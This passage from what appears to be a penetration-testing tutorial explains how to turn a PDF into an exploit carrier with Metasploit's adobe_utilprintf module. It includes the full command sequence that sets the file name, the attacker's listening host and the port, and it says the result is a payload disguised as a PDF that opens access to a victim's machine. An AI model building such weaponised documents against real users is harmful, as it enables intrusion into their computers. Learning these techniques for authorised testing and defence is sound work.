Another popular vector of attack is that of using common files to host our exploit code, and that is what we do with the malicious PDF files. We will create a payload in a PDF file; when the victim runs it using a vulnerable version of Adobe Reader, we gain access to the machine. This vector has been used many times to compromise a great number of companies. Within metasploit, there are a number of tools at our disposal that will allow us to create the PDF file. In metasploit enter the following commands:
use exploit/windows/fileformat/adobe_utilprintf set FILENAME pay.pdf set LHOST <Kali> set LPORT 5555 show options exploit
An example of the output of this command is shown in the following screenshot:
As the previous screenshot shows, we now have the payload disguised as a PDF. The screenshot also shows that we need a specific version of Adobe for the exploit to work. Again, we went through the process enough, and we will not repeat it here. The process is the same...